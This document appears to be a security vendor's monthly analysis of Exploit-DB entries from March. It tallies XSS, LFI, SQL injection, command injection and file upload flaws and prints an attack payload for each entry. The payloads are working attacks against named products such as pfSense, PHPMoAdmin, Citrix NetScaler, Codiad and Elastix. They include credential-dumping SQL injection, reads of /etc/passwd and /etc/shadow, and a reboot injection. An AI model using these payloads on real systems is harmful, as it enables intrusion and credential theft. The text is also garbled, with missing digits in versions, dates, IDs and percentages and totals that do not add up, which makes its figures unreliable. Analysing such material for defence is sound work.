EDB Analysis Report (05.03)
Exploits published on Exploit-DB (http://exploit-db.com) during 05.03.0~05.03.3, classified by type.

Summary of analysis (prepared by: Penta Security Systems, Security Evaluation Team)

Analysis of the Exploit-DB entries published in March (05.03) shows that Cross Site Scripting (hereafter XSS) attacks were reported most often. The XSS attacks analyzed require a very low level of skill, yet they can cause critical secondary damage. Of particular note is the XSS attack reported most often this month, which is possible in an open-source LMS. Administrators running that software therefore need to take particular care, through security patches and secure coding, not to be exposed to XSS attacks. This month a Command attack targeting the system password file was also found. Once an attacker obtains key files on the system, the system can be taken over far more easily. We recommend maintaining a high level of security so as not to be exposed to such attacks.

Reports by type
Type | Reports
XSS | 6
LFI | 5
Command | 3
File Upload | -
Total | 47
[Chart: reports by type]

Classification by risk level
Risk level | Reports | Percentage
High | 6 | 34.04%
- | 3 | 65.96%
- | 0 | 0.00%
Total | 47 | 00.00%
[Chart: classification by risk level]

3. Status by attack difficulty
Difficulty | Reports | Percentage
High | 5 | 0.64%
- | 5 | 0.64%
- | 37 | 78.7%
Total | 47 | 00.00%
[Chart: status by attack difficulty]

4. Occurrences by major software
Software: pfsense, PHPMoAdmin, Bedita CMS, ProjectSend, Bester, Elastix, Codoforum, Codiad, WoltLab, Triton and Websense appliance modules V-Series, Citrix NetScaler, EMC M&R (Watch4Net), Berta
Reports per software (as listed): 9, 6, 6, 5, 3, 3; total 47
[Chart: occurrences by major software; other software shown: u5cms, phpbugtracker, Magento Server, Zeuscart, Piwigo, etouch SamePage, WeBid, StaMPi, Sefrengo, Redaxscript, Pragyan, Pandora, IBM Endpoint Manager, Fork, Exponent]

** Detail for major software with 5 or more occurrences
EDB no. | Type | Difficulty/Risk | Name | Software
36435 | XSS | - | LMS.9.0 - agenda_list.php XSS | -
36435 | XSS | - | LMS.9.0 - outbox.php XSS | -
36435 | XSS | - | LMS.9.0 - student.php XSS | -
36435 | XSS | - | LMS.9.0 - ajax_get_file_listing.php XSS | -
36435 | XSS | - | LMS.9.0 - configure_extensions.php XSS | -
36435 | XSS | - | LMS.9.0 - course_category.php XSS | -
36435 | XSS | - | LMS.9.0 - session_edit.php XSS | -
36435 | XSS | - | LMS.9.0 - system_status.php XSS | -
36435 | XSS | - | LMS.9.0 - session_add.php XSS | -
36385 | - | - | Simple Photo Gallery v.0 - index.php | -
36435 | - | High, High | ECommerce-WD Plugin..5 - index.php | -
36464 | - | High, High | Spider FAQ - index.php | -
36560 | - | High | Gallery WD - index.php | -
3656 | - | - | Contact Form Maker.0. - index.php | -
36563 | - | - | Gallery WD - index.php | -
36506 | XSS | - | status_captiveportal.php XSS | pfsense
36506 | XSS | - | firewall_rules.php XSS | pfsense
36506 | XSS | - | firewall_shaper.php XSS | pfsense
36506 | XSS | - | services_unbound_acls.php XSS | pfsense
36506 | XSS | - | diag_logs_filter.php XSS | pfsense
36506 | LFI | High | system_firmware_restorefullbackup.php LFI | pfsense
3658 | - | High | CMS.0..8 - /fiyo/dapur/index.php | -
3658 | - | High, High | CMS.0..8 - article_list.php | -
3658 | - | - | CMS.0..8 - check_user.php | -
3658 | LFI | High | CMS.0..8 - browse.php LFI | -
3658 | XSS | - | CMS.0..8 - /fiyo/ XSS | -
Detailed list
Date | EDB no. | Type | Difficulty/Risk | Name | Target program | Target environment (key attack code on the following line)

05-03-0 | 365 | Command | - | PHPMoAdmin - moadmin.php Command | PHPMoAdmin | PHPMoAdmin
  Attack code: /moadmin/moadmin.php HTTP/. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 0.0; rv:36.0) Gecko/0000 Firefox/36.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Connection: keep-alive Content-Type: application/x-www-form-urlencoded object=;system('id;ls -lha');exit

05-03-0 | 3630 | - | High | Calculated Fields Form Plugin.0.0 - options-general.php | - | Calculated Fields Form Plugin.0.0
  Attack code: /wp-admin/optionsgeneral.php?page=cp_calculated_fields_form&u= or =&name=inserttext

05-03-03 | 364 | - | High | Theme Photocrati 4.x.x | - | Theme Photocrati 4.x.x
  Attack code: /wp-content/themes/photocrati-path-theme/ecommsizes.php?prod_id= or =

05-03-04 | 3665 | XSS | - | Bedita CMS - savemailgroups XSS | Bedita CMS | Bedita CMS 3.5.0
  Attack code: /bedita-3.5.0.corylus.6e9/bedita/index.php/newsletter/saveMailgroups HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 data[mailgroup][id]=&data[mailgroup][group_name]=<script>alert(0)</script>

05-03-06 | 36303 | - | High | ProjectSend r56 - useredit.php | ProjectSend | ProjectSend r56
  Attack code: /projectsend/users-edit.php?id= or =

05-03-06 | 36306 | - | High | Bester v.0.4 - showprofile.php | Bester | Bester v.0.4
  Attack code: /showprofile.php?id=' and = union select,concat(0x3a3a,0x55736573d,user(),0x0c04445f4e66d653d,database(),0x3a3a),3,4,5,6,7--

05-03-07 | 36305 | - | High | Elastix v.x - iridium_threed.php | Elastix | Elastix v.x
  Attack code: /abilling/customer/iridium_threed.php?transactionid=- and =benchmark(000000,md5())

05-03-08 | 36374 | File Upload | High | File Upload | - | Plugin Reflex Gallery 3..3
  Attack code: /wordpress/wp-content/plugins/reflexgallery/admin/scripts/fileuploader/php.php?year=05&Month=03 HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows Content-Type: multipart/form-data; boundary=---------------------------7dd009908f -----------------------------7dd009908f Content-Disposition: form-data; name="filedata"; filename="php.php" Content-Type: application/octet-stream <? phpinfo();?> -----------------------------7dd009908f--

05-03-0 | 363 | - | High, High | v0.0. - index.php | - | v0.0.
  Attack code: /index.php?page=' union all select,,(select concat(unhex(hex(cast(user.userid as char))),0x3a,unhex(hex(cast(user.pass as char)))) from `genixcms`.user limit 0,),4,5,6,7,8,9,0 and 'j'='j

05-03-0 | 363 | - | High, High | v0.0. - login.php | - | v0.0.
  Attack code: /genixcms/gxadmin/login.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 password=&username=' and(select from(select count(*),concat((select (select (select concat(unhex(hex(cast(user.userid as char))),0x3a,unhex(hex(cast(user.pass as char)))) from `genixcms`.user limit 0,) ) from `information_schema`.tables limit 0,),floor(rand(0)*))x from `information_schema`.tables group by x)a) and ''='&login=

05-03-0 | 363 | XSS | - | v0.0. - index.php XSS | - | v0.0.
  Attack code: /index.php?page=<script>confirm("zsl")</script>'

05-03-0 | 3630 | LFI | - | Codoforum v.5. - index.php LFI | Codoforum | Codoforum v.5.
  Attack code: /index.php?u=serve/attachment&path=../../../../../sites/default/config.php

05-03- | 3637 | LFI | - | Codiad v.5.3 - LFI | Codiad | Codiad v.5.3
  Attack code: /i/9756553/components/filemanager/download.php?path=../../../../../../../../../../../etc/passwd&type=undefined
05-03-3 | 36368 | XSS | - | WoltLab Community Gallery v.0 - index.php - XSS | WoltLab | WoltLab Community Gallery v.0
  Attack code: /7788bdbc/gallery/index.php/AJAXProxy/?t=7d53f8ad7553c0f885e3ccb60edbc0b65d9eed HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 [title]=<script>alert('xss')</script>

05-03-6 | 3644 | XSS | - | WPML v3..9 - XSS | - | WPML v3..9
  Attack code: /?icl_action=reminder_popup&target=javascript:alert(/xss/);//

05-03-6 | 36385 | - | - | Simple Photo Gallery v.0 - index.php | - | Simple Photo Gallery v.0
  Attack code: /index.php?option=com_simplephotogallery&view=images&albumid= or =

05-03-7 | 3648 | XSS | - | v.5.9/v.6.8/v.7.5/v.8.3 - index.php | - | v.5.9/v.6.8/v.7.5/v.8.3
  Attack code: /my/index.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 config_title=" onmouseover=prompt("xss") >

05-03-7 | 3648 | XSS | - | v.5.9/v.6.8/v.7.5/v.8.3 | - | v.5.9/v.6.8/v.7.5/v.8.3
  Attack code: /blog/index.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 title=zsl"><script>alert("xss");</script>

05-03-8 | 3643 | Command | - | Triton v7.8.3 and Websense appliance modules V-Series v7.7 - Command | Triton and Websense appliance modules V-Series | Triton v7.8.3 and Websense appliance modules V-Series v7.7
  Attack code: /appmng/servlet/commandlineservlet?type=exec&uuid=asdfasdf&module=na&command=ping&destination=7.0.0.' cat%0/etc/shadow'

05-03-9 | 36435 | XSS | - | LMS.9.0 - agenda_list.php XSS | - | LMS.9.0
  Attack code: /main/calendar/agenda_list.php?type=personal%7%0onmouseover=%7confirm%80%9%7/%3e%3c!--

05-03-9 | 36435 | XSS | - | LMS.9.0 - outbox.php XSS | - | LMS.9.0
  Attack code: /main/messages/outbox.php?f=social"+onmouseover="confirm(0)

05-03-9 | 36435 | XSS | - | LMS.9.0 - student.php XSS | - | LMS.9.0
  Attack code: /main/myspace/student.php?keyword=3337"+onmouseover=confirm(0)//&active=0&_qf search_user=&submit= Search

05-03-9 | 36435 | XSS | - | LMS.9.0 - ajax_get_file_listing.php XSS | - | LMS.9.0
  Attack code: /main/inc/lib/fckeditor/editor/plugins/ajaxfilemanager/ajax_get_file_listing.php?editor=stand_alone&view=thumbnail&search=&search_name=admin&search_recursively=0&search_mtime_from=&search_mtime_to=&search_folder=;</script><script>confirm(0)</script>

05-03-9 | 36435 | XSS | - | LMS.9.0 - configure_extensions.php XSS | - | LMS.9.0
  Attack code: /main/admin/configure_extensions.php?display=</script><script>confirm(0)</script>

05-03-9 | 36435 | XSS | - | LMS.9.0 - course_category.php XSS | - | LMS.9.0
  Attack code: /main/admin/course_category.php?action=add&category="/><script>confirm(0)</script>

05-03-9 | 36435 | XSS | - | LMS.9.0 - session_edit.php XSS | - | LMS.9.0
  Attack code: /main/admin/session_edit.php?page=resume_session.php%%0onmouseover=confirm%80%9

05-03-9 | 36435 | XSS | - | LMS.9.0 - system_status.php XSS | - | LMS.9.0
  Attack code: GET /main/admin/system_status.php?section=webserver HTTP/. User-Agent: <script>confirm(0)</script>
05-03-9 | 36435 | XSS | - | LMS.9.0 - session_add.php XSS | - | LMS.9.0
  Attack code: /main/admin/session_add.php HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows formsent=&name=<script>confirm(0)</script>&coach_username=rehan&session_category=0&nb_days_acess_before=0&nb_days_acess_after=0&start_limit=on&day_start=&month_start=3&year_start=05&end_limit=on&day_end=&month_end=3&year_end=06&session_visibility=

05-03-9 | 36435 | - | High, High | ECommerce-WD Plugin..5 - index.php | - | ECommerce-WD Plugin..5
  Attack code: /index.php?option=com_ecommercewd&controller=products&task=displayproducts HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows product_id=&product_count=&product_parameters_json=&search_name=&search_category_id=) AND (SELECT 558 FROM(SELECT COUNT(*),CONCAT(0x7786a6b7,(SELECT (ELT(558=558,))),0x7706a6a7,FLOOR(RAND(0)*))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (857=857&filter_filters_opened=&filter_manufacturer_ids=&filter_price_from=&filter_price_to=&filter_date_added_range=0&filter_minimum_rating=0&filter_tags=&arrangement=thumbs&sort_by=&sort_order=asc&pagination_limit_start=0&pagination_limit=

05-03-9 | 3644 | Command | - | Citrix NetScaler SDX svm-0.5-50-.9 - Command | Citrix NetScaler | Citrix NetScaler SDX svm-0.5-50-.9
  Attack code: /nitro/v/config/xen_hotfix HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 object={"params"%3a{"action"%3a"start"}%c"xen_hotfix"%3a[{"file_name"../../etc/passwd;reboot;"}]}

05-03-9 | 36440 | LFI | - | EMC M&R (Watch4Net) prior v6.5u | EMC M&R (Watch4Net) | EMC M&R (Watch4Net) prior v6.5u
  Attack code: /devicediscovery/devicesource/downloadseedfile?filefilename=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\system3\drivers\etc\hosts

05-03- | 36464 | - | High, High | Spider FAQ - index.php | - | Spider FAQ
  Attack code: /index.php?option=com_gallery_wd&view=gallerybox&image_id=9&gallery_id=&theme_id=%0and%0(seleCT%0673%0FROM(SELECT%0COUNT(*),CONCAT(0x76b6787,(MID((IFNULL(CAST(database()%0AS%0CHAR),0x0)),,50)),0x76a6a77,FLOOR(RAND(0)*))x%0from%0information_schema.character_SETS%0GROUP%0BY%0x)a)

05-03-6 | 36506 | XSS | - | status_captiveportal.php XSS | - | -
  Attack code: /status_captiveportal.php?zone=%7%%3e%3cscript%3Ealert%8%7ImmuniWeb%7%9;%3C/script%3E

05-03-6 | 36506 | XSS | - | firewall_rules.php XSS | - | -
  Attack code: /firewall_rules.php?undodrag=&dragtable=&if=%7%%3E%3Cscript%3Ealert%8%7ImmuniWeb%7%9;%3C/script%3E

05-03-6 | 36506 | XSS | - | firewall_shaper.php XSS | - | -
  Attack code: /firewall_shaper.php?interface=wan&action=add&queue=%7%%3E%3Cscript%3Ealert%8%7ImmuniWeb%7%9;%3C/script%3E

05-03-6 | 36506 | XSS | - | services_unbound_acls.php XSS | - | -
  Attack code: /services_unbound_acls.php?act=edit&id=%7%%3e%3Cscript%3Ealert%8%7ImmuniWeb%7%9;%3C/script%3e

05-03-6 | 36506 | XSS | - | diag_logs_filter.php XSS | - | -
  Attack code: /diag_logs_filter.php?filterlogentries_submit=&filterlogentries_time=%7%%3e%3cscript%3ealert%8%7immuniweb%7%9;%3c/script%3e

05-03-6 | 36506 | LFI | High | system_firmware_restorefullbackup.php LFI | - | -
  Attack code: /system_firmware_restorefullbackup.php?deletefile=../etc/passwd
05-03-7 | 3650 | File Upload | High | Berta CMS upload.php File Upload | Berta | Berta CMS
  Attack code: /engine/upload.php?entry=true&mediafolder=.all HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows Content-Type: multipart/form-data; boundary=---------------------------7dd009908f -----------------------------7dd009908f Content-Disposition: form-data; name="filedata"; filename="c.php" Content-Type: application/octet-stream <? phpinfo();?> -----------------------------7dd009908f--

05-03-30 | 36560 | - | High | Gallery WD - index.php | - | Gallery WD
  Attack code: /index.php?option=com_gallery_wd&view=gallerybox&image_id=9&gallery_id=&theme_id=%0and%0(seleCT%0673%0FROM(SELECT%0COUNT(*),CONCAT(0x76b6787,(MID((IFNULL(CAST(database()%0AS%0CHAR),0x0)),,50)),0x76a6a77,FLOOR(RAND(0)*))x%0from%0information_schema.character_SETS%0GROUP%0B/Y%0x)a)

05-03-30 | 3656 | - | - | Contact Form Maker.0. - index.php | - | Contact Form Maker.0.
  Attack code: /index.php?option=com_contactformmaker&view=contactformmaker&id=%0and%0=

05-03-30 | 36563 | - | - | Gallery WD - index.php | - | Contact Form Maker.0.
  Attack code: /index.php?option=com_gallery_wd&view=gallerybox&image_id=9&gallery_id=&theme_id=%0and%0(seleCT%0673%0FROM(SELECT%0COUNT(*),CONCAT(0x76b6787,(MID((IFNULL(CAST(database()%0AS%0CHAR),0x0)),,50)),0x76a6a77,FLOOR(RAND(0)*))x%0from%0information_schema.character_SETS%0GROUP%0BY%0x)a)

05-03-3 | 3658 | - | High | CMS.0..8 - /fiyo/dapur/index.php | - | CMS.0..8
  Attack code: /fiyo/dapur/index.php?app=user&act=edit&id=%0unioN%0ALL%0SELECT%0NULL,NULL,CONCAT(0x7767647,0x6645707046445786c58,0x76a76747),NULL,NULL,NULL,NULL,NULL,NULL,NULL#

05-03-3 | 3658 | - | High, High | CMS.0..8 - article_list.php | - | CMS.0..8
  Attack code: /fiyo/dapur/apps/app_article/controller/article_list.php?cat=%7%0AND%0(SELECT%0435%0FROM(SELECT%0COUNT(*),CONCAT(0x7666f767,(SELECT%0(CASE%0WHEN%0(435=435)%0THEN%0%0ELSE%00%0END)),0x76468767,FLOOR(RAND(0)*))x%0FROM%0INFORMATION_SCHEMA.CHARACTER_SETS%0GROUP%0BY%0x)a)%0AND%0%7yeEe%7=%7yeEe&user=%7%0UNION%0ALL%0SELECT%0NULL,CONCAT(0x7666f767,0x46557747546e6b54,0x76468767),null,null,null,null,null,null,null,null#&level=' AND 6567=BENCHMARK(5000000,MD5(0x57586864)) AND 'hmlh'='hmlh

05-03-3 | 3658 | - | - | CMS.0..8 - check_user.php | - | CMS.0..8
  Attack code: /fiyo/dapur/apps/app_user/controller/check_user.php HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows act=email&email=test@asdas.com' AND SLEEP(5) AND 'UjqT'='UjqT

05-03-3 | 3658 | LFI | High | CMS.0..8 - browse.php LFI | - | CMS.0..8
  Attack code: /fiyo//plugins/plg_kcfinder/browse.php?type=files&lng=en&act=download HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows dir=files&file=../../../../../../../etc/passwd

05-03-3 | 3658 | XSS | - | CMS.0..8 - /fiyo/ XSS | - | CMS.0..8
  Attack code: /fiyo/?app=article&view=item3ab"><script>alert()</script>0ccba&id=86